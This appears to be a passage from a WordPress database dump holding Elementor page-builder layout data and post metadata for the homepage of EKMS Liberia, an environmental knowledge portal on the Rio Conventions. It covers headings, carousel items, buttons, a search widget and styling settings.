{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13240,2144,'_elementor_version','2.7.5'),(13241,2144,'_elementor_template_type','wp-page'),(13242,2144,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13245,2145,'_wp_page_template','default'),(13246,2145,'_elementor_edit_mode','builder'),(13247,2145,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"left\",\"title_color\":\"rgba(0,0,0,0.68)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"left\",\"text_color\":\"rgba(0,0,0,0.74)\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"s